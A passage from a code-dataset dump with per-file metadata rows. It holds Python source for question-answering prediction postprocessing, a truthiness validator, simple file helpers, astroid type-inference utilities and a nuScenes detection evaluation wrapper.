offset_mapping = features[feature_index]["offset_mapping"]
# Optional `token_is_max_context`, if provided we will remove answers that do not have the maximum context
# available in the current feature.
token_is_max_context = features[feature_index].get("token_is_max_context", None)
# Update minimum null prediction.
feature_null_score = start_logits[0] + end_logits[0]
if min_null_prediction is None or min_null_prediction["score"] > feature_null_score:
min_null_prediction = {
"offsets": (0, 0),
"score": feature_null_score,
"start_logit": start_logits[0],
"end_logit": end_logits[0],
}
# Go through all possibilities for the `n_best_size` greater start and end logits.
start_indexes = np.argsort(start_logits)[-1 : -n_best_size - 1 : -1].tolist()
end_indexes = np.argsort(end_logits)[-1 : -n_best_size - 1 : -1].tolist()
for start_index in start_indexes:
for end_index in end_indexes:
# Don't consider out-of-scope answers, either because the indices are out of bounds or correspond
# to part of the input_ids that are not in the context.
if (
start_index >= len(offset_mapping)
or end_index >= len(offset_mapping)
or offset_mapping[start_index] is None
or offset_mapping[end_index] is None
):
continue
# Don't consider answers with a length that is either < 0 or > max_answer_length.
if end_index < start_index or end_index - start_index + 1 > max_answer_length:
continue
# Don't consider answer that don't have the maximum context available (if such information is
# provided).
if token_is_max_context is not None and not token_is_max_context.get(str(start_index), False):
continue
prelim_predictions.append(
{
"offsets": (offset_mapping[start_index][0], offset_mapping[end_index][1]),
"score": start_logits[start_index] + end_logits[end_index],
"start_logit": start_logits[start_index],
"end_logit": end_logits[end_index],
}
)
if version_2_with_negative:
# Add the minimum null prediction
prelim_predictions.append(min_null_prediction)
null_score = min_null_prediction["score"]
# Only keep the best `n_best_size` predictions.
predictions = sorted(prelim_predictions, key=lambda x: x["score"], reverse=True)[:n_best_size]
# Add back the minimum null prediction if it was removed because of its low score.
if version_2_with_negative and not any(p["offsets"] == (0, 0) for p in predictions):
predictions.append(min_null_prediction)
# Use the offsets to gather the answer text in the original context.
context = example["context"]
for pred in predictions:
offsets = pred.pop("offsets")
pred["text"] = context[offsets[0] : offsets[1]]
# In the very rare edge case we have not a single non-null prediction, we create a fake prediction to avoid
# failure.
if len(predictions) == 0 or (len(predictions) == 1 and predictions[0]["text"] == ""):
predictions.insert(0, {"text": "empty", "start_logit": 0.0, "end_logit": 0.0, "score": 0.0})
# Compute the softmax of all scores (we do it with numpy to stay independent from torch/tf in this file, using
# the LogSumExp trick).
scores = np.array([pred.pop("score") for pred in predictions])
exp_scores = np.exp(scores - np.max(scores))
probs = exp_scores / exp_scores.sum()
# Include the probabilities in our predictions.
for prob, pred in zip(probs, predictions):
pred["probability"] = prob
# Pick the best prediction. If the null answer is not possible, this is easy.
if not version_2_with_negative:
all_predictions[example["id"]] = predictions[0]["text"]
else:
# Otherwise we first need to find the best non-empty prediction.
i = 0
while predictions[i]["text"] == "":
i += 1
best_non_null_pred = predictions[i]
# Then we compare to the null prediction using the threshold.
score_diff = null_score - best_non_null_pred["start_logit"] - best_non_null_pred["end_logit"]
scores_diff_json[example["id"]] = float(score_diff) # To be JSON-serializable.
if score_diff > null_score_diff_threshold:
all_predictions[example["id"]] = ""
else:
all_predictions[example["id"]] = best_non_null_pred["text"]
# Make `predictions` JSON-serializable by casting np.float back to float.
all_nbest_json[example["id"]] = [
{k: (float(v) if isinstance(v, (np.float16, np.float32, np.float64)) else v) for k, v in pred.items()}
for pred in predictions
]
# If we have an output_dir, let's save all those dicts.
if output_dir is not None:
assert os.path.isdir(output_dir), f"{output_dir} is not a directory."
prediction_file = os.path.join(
output_dir, "predictions.json" if prefix is None else f"{prefix}_predictions.json"
)
nbest_file = os.path.join(
output_dir, "nbest_predictions.json" if prefix is None else f"{prefix}_nbest_predictions.json"
)
if version_2_with_negative:
null_odds_file = os.path.join(
output_dir, "null_odds.json" if prefix is None else f"{prefix}_null_odds.json"
)
logger.info(f"Saving predictions to {prediction_file}.")
with open(prediction_file, "w") as writer:
writer.write(json.dumps(all_predictions, indent=4) + "\n")
logger.info(f"Saving nbest_preds to {nbest_file}.")
with open(nbest_file, "w") as writer:
writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
if version_2_with_negative:
logger.info(f"Saving null_odds to {null_odds_file}.")
with open(null_odds_file, "w") as writer:
writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
return all_predictions
def postprocess_qa_predictions_with_beam_search(
examples,
features,
predictions: Tuple[np.ndarray, np.ndarray],
version_2_with_negative: bool = False,
n_best_size: int = 20,
max_answer_length: int = 30,
start_n_top: int = 5,
end_n_top: int = 5,
output_dir: Optional[str] = None,
prefix: Optional[str] = None,
is_world_process_zero: bool = True,
):
"""
Post-processes the predictions of a question-answering model with beam search to convert them to answers that are substrings of the
original contexts. This is the postprocessing functions for models that return start and end logits, indices, as well as
cls token predictions.
Args:
examples: The non-preprocessed dataset (see the main script for more information).
features: The processed dataset (see the main script for more information).
predictions (:obj:`Tuple[np.ndarray, np.ndarray]`):
The predictions of the model: two arrays containing the start logits and the end logits respectively. Its
first dimension must match the number of elements of :obj:`features`.
version_2_with_negative (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not the underlying dataset contains examples with no answers.
n_best_size (:obj:`int`, `optional`, defaults to 20):
The total number of n-best predictions to generate when looking for an answer.
max_answer_length (:obj:`int`, `optional`, defaults to 30):
The maximum length of an answer that can be generated. This is needed because the start and end predictions
are not conditioned on one another.
start_n_top (:obj:`int`, `optional`, defaults to 5):
The number of top start logits too keep when searching for the :obj:`n_best_size` predictions.
end_n_top (:obj:`int`, `optional`, defaults to 5):
The number of top end logits too keep when searching for the :obj:`n_best_size` predictions.
output_dir (:obj:`str`, `optional`):
If provided, the dictionaries of predictions, n_best predictions (with their scores and logits) and, if
:obj:`version_2_with_negative=True`, the dictionary of the scores differences between best and null
answers, are saved in `output_dir`.
prefix (:obj:`str`, `optional`):
If provided, the dictionaries mentioned above are saved with `prefix` added to their names.
is_world_process_zero (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether this process is the main process or not (used to determine if logging/saves should be done).
"""
assert len(predictions) == 5, "`predictions` should be a tuple with five elements."
start_top_log_probs, start_top_index, end_top_log_probs, end_top_index, cls_logits = predictions
assert len(predictions[0]) == len(
features
), f"Got {len(predictions[0])} predicitions and {len(features)} features."
# Build a map example to its corresponding features.
example_id_to_index = {k: i for i, k in enumerate(examples["id"])}
features_per_example = collections.defaultdict(list)
for i, feature in enumerate(features):
features_per_example[example_id_to_index[feature["example_id"]]].append(i)
# The dictionaries we have to fill.
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
scores_diff_json = collections.OrderedDict() if version_2_with_negative else None
# Logging.
logger.setLevel(logging.INFO if is_world_process_zero else logging.WARN)
logger.info(f"Post-processing {len(examples)} example predictions split into {len(features)} features.")
# Let's loop over all the examples!
for example_index, example in enumerate(tqdm(examples)):
# Those are the indices of the features associated to the current example.
feature_indices = features_per_example[example_index]
min_null_score = None
prelim_predictions = []
# Looping through all the features associated to the current example.
for feature_index in feature_indices:
# We grab the predictions of the model for this feature.
start_log_prob = start_top_log_probs[feature_index]
start_indexes = start_top_index[feature_index]
end_log_prob = end_top_log_probs[feature_index]
end_indexes = end_top_index[feature_index]
feature_null_score = cls_logits[feature_index]
# This is what will allow us to map some the positions in our logits to span of texts in the original
# context.
offset_mapping = features[feature_index]["offset_mapping"]
# Optional `token_is_max_context`, if provided we will remove answers that do not have the maximum context
# available in the current feature.
token_is_max_context = features[feature_index].get("token_is_max_context", None)
# Update minimum null prediction
if min_null_score is None or feature_null_score < min_null_score:
min_null_score = feature_null_score
# Go through all possibilities for the `n_start_top`/`n_end_top` greater start and end logits.
for i in range(start_n_top):
for j in range(end_n_top):
start_index = int(start_indexes[i])
j_index = i * end_n_top + j
end_index = int(end_indexes[j_index])
# Don't consider out-of-scope answers (last part of the test should be unnecessary because of the
# p_mask but let's not take any risk)
if (
start_index >= len(offset_mapping)
or end_index >= len(offset_mapping)
or offset_mapping[start_index] is None
or offset_mapping[end_index] is None
):
continue
# Don't consider answers with a length negative or > max_answer_length.
if end_index < start_index or end_index - start_index + 1 > max_answer_length:
continue
# Don't consider answer that don't have the maximum context available (if such information is
# provided).
if token_is_max_context is not None and not token_is_max_context.get(str(start_index), False):
continue
prelim_predictions.append(
{
"offsets": (offset_mapping[start_index][0], offset_mapping[end_index][1]),
"score": start_log_prob[i] + end_log_prob[j_index],
"start_log_prob": start_log_prob[i],
"end_log_prob": end_log_prob[j_index],
}
)
# Only keep the best `n_best_size` predictions.
predictions = sorted(prelim_predictions, key=lambda x: x["score"], reverse=True)[:n_best_size]
# Use the offsets to gather the answer text in the original context.
context = example["context"]
for pred in predictions:
offsets = pred.pop("offsets")
pred["text"] = context[offsets[0] : offsets[1]]
# In the very rare edge case we have not a single non-null prediction, we create a fake prediction to avoid
# failure.
if len(predictions) == 0:
predictions.insert(0, {"text": "", "start_logit": -1e-6, "end_logit": -1e-6, "score": -2e-6})
# Compute the softmax of all scores (we do it with numpy to stay independent from torch/tf in this file, using
# the LogSumExp trick).
scores = np.array([pred.pop("score") for pred in predictions])
exp_scores = np.exp(scores - np.max(scores))
probs = exp_scores / exp_scores.sum()
# Include the probabilities in our predictions.
for prob, pred in zip(probs, predictions):
pred["probability"] = prob
# Pick the best prediction and set the probability for the null answer.
all_predictions[example["id"]] = predictions[0]["text"]
if version_2_with_negative:
scores_diff_json[example["id"]] = float(min_null_score)
# Make `predictions` JSON-serializable by casting np.float back to float.
all_nbest_json[example["id"]] = [
{k: (float(v) if isinstance(v, (np.float16, np.float32, np.float64)) else v) for k, v in pred.items()}
for pred in predictions
]
# If we have an output_dir, let's save all those dicts.
if output_dir is not None:
assert os.path.isdir(output_dir), f"{output_dir} is not a directory."
prediction_file = os.path.join(
output_dir, "predictions.json" if prefix is None else f"{prefix}_predictions.json"
)
nbest_file = os.path.join(
output_dir, "nbest_predictions.json" if prefix is None else f"{prefix}_nbest_predictions.json"
)
if version_2_with_negative:
null_odds_file = os.path.join(
output_dir, "null_odds.json" if prefix is None else f"{prefix}_null_odds.json"
)
print(f"Saving predictions to {prediction_file}.")
with open(prediction_file, "w") as writer:
writer.write(json.dumps(all_predictions, indent=4) + "\n")
print(f"Saving nbest_preds to {nbest_file}.")
with open(nbest_file, "w") as writer:
writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
if version_2_with_negative:
print(f"Saving null_odds to {null_odds_file}.")
with open(null_odds_file, "w") as writer:
writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
return all_predictions, scores_diff_json
| 52.016432
| 135
| 0.642087
|
517149aa62cbe4a2cd19156a0e76009f5846dc49
| 876
|
py
|
Python
|
validators/truthy.py
|
alimcmaster1/validators
|
29df0817d840263c371c32bd704706c6a8a36a85
|
[
"MIT"
] | 586
|
2015-01-17T08:54:54.000Z
|
2022-03-26T08:32:58.000Z
|
validators/truthy.py
|
alimcmaster1/validators
|
29df0817d840263c371c32bd704706c6a8a36a85
|
[
"MIT"
] | 157
|
2015-06-24T07:29:04.000Z
|
2022-03-19T07:29:03.000Z
|
validators/truthy.py
|
alimcmaster1/validators
|
29df0817d840263c371c32bd704706c6a8a36a85
|
[
"MIT"
] | 138
|
2015-06-22T14:27:35.000Z
|
2022-03-27T21:00:25.000Z
|
from .utils import validator
@validator
def truthy(value):
"""
Validate that given value is not a falsey value.
This validator is based on `WTForms DataRequired validator`_.
.. _WTForms DataRequired validator:
https://github.com/wtforms/wtforms/blob/master/wtforms/validators.py
Examples::
>>> truthy(1)
True
>>> truthy('someone')
True
>>> truthy(0)
ValidationFailure(func=truthy, args={'value': 0})
>>> truthy(' ')
ValidationFailure(func=truthy, args={'value': ' '})
>>> truthy(False)
ValidationFailure(func=truthy, args={'value': False})
>>> truthy(None)
ValidationFailure(func=truthy, args={'value': None})
.. versionadded:: 0.2
"""
return (
value and
(not isinstance(value, str) or value.strip())
)
| 21.9
| 75
| 0.579909
|
49afa85406380c1aa16db0af8922d7ac3dc91368
| 590
|
py
|
Python
|
src/utils/files.py
|
amanmalali/CompilerDock
|
0157c03c86ce9596ae7dfaaf298b794848e0c98b
|
[
"MIT"
] | 10
|
2020-06-28T14:25:17.000Z
|
2021-12-29T01:21:35.000Z
|
src/utils/files.py
|
amanmalali/CompilerDock
|
0157c03c86ce9596ae7dfaaf298b794848e0c98b
|
[
"MIT"
] | 3
|
2020-07-10T10:48:42.000Z
|
2020-07-26T14:08:15.000Z
|
src/utils/files.py
|
amanmalali/CompilerDock
|
0157c03c86ce9596ae7dfaaf298b794848e0c98b
|
[
"MIT"
] | 1
|
2020-06-28T14:31:15.000Z
|
2020-06-28T14:31:15.000Z
|
def init_dir(dest, filenames):
for name in filenames:
with open(f"{dest}/{name}", "w") as _:
pass
def create_files(data, filename, dest):
with open(f"{dest}/{filename}", "w") as file:
file.write(data)
def error_check(dest, filename):
with open(f"{dest}/{filename}", "r") as error_file:
errors = error_file.read()
if errors == "":
return (errors, False)
return (errors, True)
def read_ouput(dest, filename):
with open(f"{dest}/{filename}", "r") as file:
output = file.read()
return output
| 24.583333
| 55
| 0.574576
|
c49ce66c207dcd98e024e62b8b455177fe920eca
| 10,857
|
py
|
Python
|
venv/Lib/site-packages/astroid/helpers.py
|
msactiondigital/mslearn-django-models-data
|
0833beaeac9aa1664193557a405e1e536ca411c2
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
venv/Lib/site-packages/astroid/helpers.py
|
msactiondigital/mslearn-django-models-data
|
0833beaeac9aa1664193557a405e1e536ca411c2
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
venv/Lib/site-packages/astroid/helpers.py
|
msactiondigital/mslearn-django-models-data
|
0833beaeac9aa1664193557a405e1e536ca411c2
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
# Copyright (c) 2015-2020 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2015-2016 Ceridwen <ceridwenv@gmail.com>
# Copyright (c) 2018 Bryce Guinta <bryce.paul.guinta@gmail.com>
# Copyright (c) 2020-2021 hippo91 <guillaume.peillex@gmail.com>
# Copyright (c) 2020 Simon Hewitt <si@sjhewitt.co.uk>
# Copyright (c) 2020 Bryce Guinta <bryce.guinta@protonmail.com>
# Copyright (c) 2020 Ram Rachum <ram@rachum.com>
# Copyright (c) 2021 Daniël van Noord <13665637+DanielNoord@users.noreply.github.com>
# Copyright (c) 2021 Pierre Sassoulas <pierre.sassoulas@gmail.com>
# Copyright (c) 2021 David Liu <david@cs.toronto.edu>
# Copyright (c) 2021 Marc Mueller <30130371+cdce8p@users.noreply.github.com>
# Copyright (c) 2021 Andrew Haigh <hello@nelf.in>
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/main/LICENSE
"""
Various helper utilities.
"""
from astroid import bases, manager, nodes, raw_building, util
from astroid.context import CallContext, InferenceContext
from astroid.exceptions import (
AstroidTypeError,
AttributeInferenceError,
InferenceError,
MroError,
_NonDeducibleTypeHierarchy,
)
from astroid.nodes import scoped_nodes
def _build_proxy_class(cls_name, builtins):
proxy = raw_building.build_class(cls_name)
proxy.parent = builtins
return proxy
def _function_type(function, builtins):
if isinstance(function, scoped_nodes.Lambda):
if function.root().name == "builtins":
cls_name = "builtin_function_or_method"
else:
cls_name = "function"
elif isinstance(function, bases.BoundMethod):
cls_name = "method"
elif isinstance(function, bases.UnboundMethod):
cls_name = "function"
return _build_proxy_class(cls_name, builtins)
def _object_type(node, context=None):
astroid_manager = manager.AstroidManager()
builtins = astroid_manager.builtins_module
context = context or InferenceContext()
for inferred in node.infer(context=context):
if isinstance(inferred, scoped_nodes.ClassDef):
if inferred.newstyle:
metaclass = inferred.metaclass(context=context)
if metaclass:
yield metaclass
continue
yield builtins.getattr("type")[0]
elif isinstance(inferred, (scoped_nodes.Lambda, bases.UnboundMethod)):
yield _function_type(inferred, builtins)
elif isinstance(inferred, scoped_nodes.Module):
yield _build_proxy_class("module", builtins)
else:
yield inferred._proxied
def object_type(node, context=None):
"""Obtain the type of the given node
This is used to implement the ``type`` builtin, which means that it's
used for inferring type calls, as well as used in a couple of other places
in the inference.
The node will be inferred first, so this function can support all
sorts of objects, as long as they support inference.
"""
try:
types = set(_object_type(node, context))
except InferenceError:
return util.Uninferable
if len(types) > 1 or not types:
return util.Uninferable
return list(types)[0]
def _object_type_is_subclass(obj_type, class_or_seq, context=None):
if not isinstance(class_or_seq, (tuple, list)):
class_seq = (class_or_seq,)
else:
class_seq = class_or_seq
if obj_type is util.Uninferable:
return util.Uninferable
# Instances are not types
class_seq = [
item if not isinstance(item, bases.Instance) else util.Uninferable
for item in class_seq
]
# strict compatibility with issubclass
# issubclass(type, (object, 1)) evaluates to true
# issubclass(object, (1, type)) raises TypeError
for klass in class_seq:
if klass is util.Uninferable:
raise AstroidTypeError("arg 2 must be a type or tuple of types")
for obj_subclass in obj_type.mro():
if obj_subclass == klass:
return True
return False
def object_isinstance(node, class_or_seq, context=None):
"""Check if a node 'isinstance' any node in class_or_seq
:param node: A given node
:param class_or_seq: Union[nodes.NodeNG, Sequence[nodes.NodeNG]]
:rtype: bool
:raises AstroidTypeError: if the given ``classes_or_seq`` are not types
"""
obj_type = object_type(node, context)
if obj_type is util.Uninferable:
return util.Uninferable
return _object_type_is_subclass(obj_type, class_or_seq, context=context)
def object_issubclass(node, class_or_seq, context=None):
"""Check if a type is a subclass of any node in class_or_seq
:param node: A given node
:param class_or_seq: Union[Nodes.NodeNG, Sequence[nodes.NodeNG]]
:rtype: bool
:raises AstroidTypeError: if the given ``classes_or_seq`` are not types
:raises AstroidError: if the type of the given node cannot be inferred
or its type's mro doesn't work
"""
if not isinstance(node, nodes.ClassDef):
raise TypeError(f"{node} needs to be a ClassDef node")
return _object_type_is_subclass(node, class_or_seq, context=context)
def safe_infer(node, context=None):
"""Return the inferred value for the given node.
Return None if inference failed or if there is some ambiguity (more than
one node has been inferred).
"""
try:
inferit = node.infer(context=context)
value = next(inferit)
except (InferenceError, StopIteration):
return None
try:
next(inferit)
return None # None if there is ambiguity on the inferred node
except InferenceError:
return None # there is some kind of ambiguity
except StopIteration:
return value
def has_known_bases(klass, context=None):
"""Return true if all base classes of a class could be inferred."""
try:
return klass._all_bases_known
except AttributeError:
pass
for base in klass.bases:
result = safe_infer(base, context=context)
# TODO: check for A->B->A->B pattern in class structure too?
if (
not isinstance(result, scoped_nodes.ClassDef)
or result is klass
or not has_known_bases(result, context=context)
):
klass._all_bases_known = False
return False
klass._all_bases_known = True
return True
def _type_check(type1, type2):
if not all(map(has_known_bases, (type1, type2))):
raise _NonDeducibleTypeHierarchy
if not all([type1.newstyle, type2.newstyle]):
return False
try:
return type1 in type2.mro()[:-1]
except MroError as e:
# The MRO is invalid.
raise _NonDeducibleTypeHierarchy from e
def is_subtype(type1, type2):
"""Check if *type1* is a subtype of *type2*."""
return _type_check(type1=type2, type2=type1)
def is_supertype(type1, type2):
"""Check if *type2* is a supertype of *type1*."""
return _type_check(type1, type2)
def class_instance_as_index(node):
"""Get the value as an index for the given instance.
If an instance provides an __index__ method, then it can
be used in some scenarios where an integer is expected,
for instance when multiplying or subscripting a list.
"""
context = InferenceContext()
try:
for inferred in node.igetattr("__index__", context=context):
if not isinstance(inferred, bases.BoundMethod):
continue
context.boundnode = node
context.callcontext = CallContext(args=[], callee=inferred)
for result in inferred.infer_call_result(node, context=context):
if isinstance(result, nodes.Const) and isinstance(result.value, int):
return result
except InferenceError:
pass
return None
def object_len(node, context=None):
"""Infer length of given node object
:param Union[nodes.ClassDef, nodes.Instance] node:
:param node: Node to infer length of
:raises AstroidTypeError: If an invalid node is returned
from __len__ method or no __len__ method exists
:raises InferenceError: If the given node cannot be inferred
or if multiple nodes are inferred or if the code executed in python
would result in a infinite recursive check for length
:rtype int: Integer length of node
"""
# pylint: disable=import-outside-toplevel; circular import
from astroid.objects import FrozenSet
inferred_node = safe_infer(node, context=context)
# prevent self referential length calls from causing a recursion error
# see https://github.com/PyCQA/astroid/issues/777
node_frame = node.frame()
if (
isinstance(node_frame, scoped_nodes.FunctionDef)
and node_frame.name == "__len__"
and hasattr(inferred_node, "_proxied")
and inferred_node._proxied == node_frame.parent
):
message = (
"Self referential __len__ function will "
"cause a RecursionError on line {} of {}".format(
node.lineno, node.root().file
)
)
raise InferenceError(message)
if inferred_node is None or inferred_node is util.Uninferable:
raise InferenceError(node=node)
if isinstance(inferred_node, nodes.Const) and isinstance(
inferred_node.value, (bytes, str)
):
return len(inferred_node.value)
if isinstance(inferred_node, (nodes.List, nodes.Set, nodes.Tuple, FrozenSet)):
return len(inferred_node.elts)
if isinstance(inferred_node, nodes.Dict):
return len(inferred_node.items)
node_type = object_type(inferred_node, context=context)
if not node_type:
raise InferenceError(node=node)
try:
len_call = next(node_type.igetattr("__len__", context=context))
except StopIteration as e:
raise AstroidTypeError(str(e)) from e
except AttributeInferenceError as e:
raise AstroidTypeError(
f"object of type '{node_type.pytype()}' has no len()"
) from e
inferred = len_call.infer_call_result(node, context)
if inferred is util.Uninferable:
raise InferenceError(node=node, context=context)
result_of_len = next(inferred, None)
if (
isinstance(result_of_len, nodes.Const)
and result_of_len.pytype() == "builtins.int"
):
return result_of_len.value
if (
result_of_len is None
or isinstance(result_of_len, bases.Instance)
and result_of_len.is_subtype_of("builtins.int")
):
# Fake a result as we don't know the arguments of the instance call.
return 0
raise AstroidTypeError(
f"'{result_of_len}' object cannot be interpreted as an integer"
)
| 34.357595
| 85
| 0.677719
|
d27f642f0169d4592e8623dd7ed3ce2c2f83ff2f
| 9,739
|
py
|
Python
|
python-sdk/nuscenes/eval/detection/evaluate_wrapper.py
|
recogni/nuscenes-devkit
|
023dbc213b13b7026fc7723a93ceab717752678d
|
[
"Apache-2.0"
] | null | null | null |
python-sdk/nuscenes/eval/detection/evaluate_wrapper.py
|
recogni/nuscenes-devkit
|
023dbc213b13b7026fc7723a93ceab717752678d
|
[
"Apache-2.0"
] | 1
|
2021-12-20T15:03:04.000Z
|
2021-12-21T08:53:49.000Z
|
python-sdk/nuscenes/eval/detection/evaluate_wrapper.py
|
recogni/nuscenes-devkit
|
023dbc213b13b7026fc7723a93ceab717752678d
|
[
"Apache-2.0"
] | null | null | null |
# nuScenes dev-kit eval wrapper copied from python-sdk/nuscenes/eval/detection/evaluate.py.
# Original code written by Holger Caesar & Oscar Beijbom, 2018. Edited for internal usage.
from typing import List
from pyquaternion import Quaternion
from typing import Tuple, Dict, Any
from glob import glob
import numpy as np
from copy import deepcopy
import os
from nuscenes.eval.common.data_classes import EvalBoxes
from nuscenes.eval.detection.algo import calc_ap, calc_tp, match_boxes, stats_from_matches
from nuscenes.eval.common.utils import center_distance
from nuscenes.eval.detection.constants import TP_METRICS, DETECTION_NAMES
from nuscenes.eval.detection.data_classes import DetectionConfig, DetectionMetrics, DetectionBox, \
DetectionMetricDataList
class DetectionEvalWrapper:
"""
This is the un-official nuScenes detection evaluation code.
nuScenes uses the following detection metrics:
- Mean Average Precision (mAP): Uses center-distance as matching criterion; averaged over distance thresholds.
- True Positive (TP) metrics: Average of translation, scale, orientation.
- nuScenes Detection Score (NDS): The weighted sum of the above.
We assume that:
- Every sample_token is given in the results, although there may be not predictions for that sample.
Please see https://www.nuscenes.org/object-detection for more details.
"""
AP_ERRORS = 'mean_dist_aps'
TP_ERRORS = 'label_tp_errors'
TRANSLATION_ERROR = "trans_err"
SCALE_ERROR = "scale_err"
ORIENTATION_ERROR = "orient_err"
def __init__(self,
gt_boxes: EvalBoxes,
pred_boxes: EvalBoxes,
verbose: bool = False):
"""
Init method.
:param gt_boxes: Ground Truth boxes.
:param pred_boxes: Predicted boxes.
:param verbose: Specify as true to print intermediate logs to stdout.
"""
self.verbose = verbose
# todo|note class ranges are not used. The range can be specified in the __call__ args.
self.cfg = DetectionConfig(class_range={
"car": 100,
"truck": 100,
"bus": 100,
"trailer": 100,
"construction_vehicle": 100,
"pedestrian": 100,
"motorcycle": 100,
"bicycle": 100,
"traffic_cone": 100,
"barrier": 100
},
dist_fcn="center_distance",
min_recall=0.1,
min_precision=0.1,
max_boxes_per_sample=500,
dist_ths=[0.0], # todo|note not used
dist_th_tp=0.0, # todo|note not used
mean_ap_weight=0, # todo|note not used
)
# Load data.
if verbose:
print('Initializing nuScenes detection evaluation')
self.pred_boxes = pred_boxes
self.gt_boxes = gt_boxes
assert set(self.pred_boxes.sample_tokens) == set(self.gt_boxes.sample_tokens), \
"Samples in split doesn't match samples in predictions."
def _evaluate(self, min_z: float, max_z: float, rel_dist_ths: List[float], rel_tp_dist_th: float) -> Tuple[DetectionMetrics, DetectionMetricDataList]:
"""
Performs the actual evaluation.
:param min_z: Min allowed Z. Filters boxes whose Z value is less than this.
:param max_z: Max allowed Z. Filter boxes whose Z value is more than this.
:param rel_dist_ths: Relative distance thresholds needed for matching GT to predictions, and then APs are averaged.
:param rel_tp_dist_th: Relative distance Threshold for the true positive metric.
:return: A tuple of high-level and the raw metric data.
"""
rel_dist_ths_ = deepcopy(rel_dist_ths)
if rel_tp_dist_th not in rel_dist_ths:
rel_dist_ths_.append(rel_tp_dist_th)
# -----------------------------------
# Step 0: Filter boxes for the specified range.
# -----------------------------------
gt_boxes = self._filter_boxes(self.gt_boxes, min_z=min_z, max_z=max_z, verbose=self.verbose)
pred_boxes = self._filter_boxes(self.pred_boxes, min_z=min_z, max_z=max_z, verbose=self.verbose)
# -----------------------------------
# Step 1: Accumulate metric data for all classes and distance thresholds.
# -----------------------------------
if self.verbose:
print('Accumulating metric data...')
metric_data_list = DetectionMetricDataList()
for rel_dist_th in rel_dist_ths_:
matches = match_boxes(gt_boxes, pred_boxes, dist_fcn=center_distance, rel_dist_th=rel_dist_th,
dist_th=0.25)
for class_name in self.cfg.class_names:
md = stats_from_matches(matches, class_name)
metric_data_list.set(class_name, rel_dist_th, md)
# -----------------------------------
# Step 2: Calculate metrics from the data.
# -----------------------------------
if self.verbose:
print('Calculating metrics...')
metrics = DetectionMetrics(self.cfg)
for class_name in self.cfg.class_names:
# Compute APs.
for rel_dist_th in rel_dist_ths:
metric_data = metric_data_list[(class_name, rel_dist_th)]
ap = calc_ap(metric_data, self.cfg.min_recall, self.cfg.min_precision)
metrics.add_label_ap(class_name, rel_dist_th, ap)
# Compute TP metrics.
for metric_name in TP_METRICS:
metric_data = metric_data_list[(class_name, rel_tp_dist_th)]
if class_name in ['traffic_cone'] and metric_name in ['attr_err', 'vel_err', 'orient_err']:
tp = np.nan
elif class_name in ['barrier'] and metric_name in ['attr_err', 'vel_err']:
tp = np.nan
else:
tp = calc_tp(metric_data, self.cfg.min_recall, metric_name)
metrics.add_label_tp(class_name, metric_name, tp)
return metrics, metric_data_list
def _filter_boxes(self,
boxes: EvalBoxes,
min_z: float,
max_z: float,
verbose: bool = False) -> EvalBoxes:
"""
Applies filtering to boxes based on the Z value.
:param boxes: An instance of the EvalBoxes class to be filtered.
:param min_z: Min allowed Z.
:param max_z: Max allowed Z.
:param verbose: Whether to print to stdout.
"""
boxes = deepcopy(boxes)
# Accumulators for number of filtered boxes.
total, dist_filter = 0, 0
for ind, sample_token in enumerate(boxes.sample_tokens):
# Filter on distance.
total += len(boxes[sample_token])
boxes.boxes[sample_token] = [box for box in boxes[sample_token] if
max_z >= box.translation[1] >= min_z]
dist_filter += len(boxes[sample_token])
if verbose:
print("=> Original number of boxes: %d" % total)
print("=> After distance based filtering: %d" % dist_filter)
return boxes
def __call__(self, min_z: float, max_z: float, rel_dist_thresholds: List[float], rel_tp_dist_threshold: float) -> Dict[str, Any]:
"""
Main function that loads the evaluation code, visualizes samples, runs the evaluation.
:param min_z: Min allowed Z. Filters boxes whose Z value is less than this.
:param max_z: Max allowed Z. Filter boxes whose Z value is more than this.
:param rel_dist_thresholds: Relative distance thresholds needed for matching GT to predictions, and then APs are averaged.
:param rel_tp_dist_threshold: Relative distance threshold for the true positive metric.
:return: A dict that stores the high-level metrics and meta data.
"""
# Run evaluation.
metrics, metric_data_list = self._evaluate(min_z=min_z, max_z=max_z, rel_dist_ths=rel_dist_thresholds, rel_tp_dist_th=rel_tp_dist_threshold)
metrics_summary = metrics.serialize()
if self.verbose:
# Print per-class metrics.
print('Object Class\tAP\tATE\tASE\tAOE')
class_aps = metrics_summary[self.AP_ERRORS]
class_tps = metrics_summary[self.TP_ERRORS]
for class_name in class_aps.keys():
if class_name.lower() in ["car", "pedestrian"]:
print('%s \t%.3f\t%.3f\t%.3f\t%.3f'
% (class_name, class_aps[class_name],
class_tps[class_name][self.TRANSLATION_ERROR],
class_tps[class_name][self.SCALE_ERROR],
class_tps[class_name][self.ORIENTATION_ERROR]))
return metrics_summary
if __name__ == "__main__":
# Try eval code.
# todo|note specify the path which has numpy files with predictions and gt data.
# You can find an example here: gs://reco-tf-out/tmp/alok/data-links/data.npy, which has predictions from encoded GT.
data = np.load('/numpy/data/path', allow_pickle=True).item()
_gt_boxes, _pred_boxes = data['gt'], data['pred']
nusc_eval = DetectionEvalWrapper(gt_boxes=_gt_boxes, pred_boxes=_pred_boxes, verbose=True)
for _min_z, _max_z in zip([0, 0, 20, 40, 60, 80], [100, 20, 40, 60, 80, 100]):
rel_ap_thresholds = [0.05]
print(f"Range of prediction and detections: min_z: {_min_z}, max_z: {_max_z}")
print(f"relative AP_thresholds: {rel_ap_thresholds}")
metrics_summary = nusc_eval(min_z=_min_z, max_z=_max_z, rel_dist_thresholds=rel_ap_thresholds, rel_tp_dist_threshold=0.05)
| 44.880184
| 154
| 0.624705
|
41ee1cd723c81ab4770567d1688f6df6e1fc8512
| 4,217
|
py
|
Python
|
kaa/ui/selectlist/selectlist.py
|
tnhung2011/kaa
|
e6a8819a5ecba04b7db8303bd5736b5a7c9b822d
|
[
"Unlicense"
] | 82
|
2015-01-26T15:34:03.000Z
|
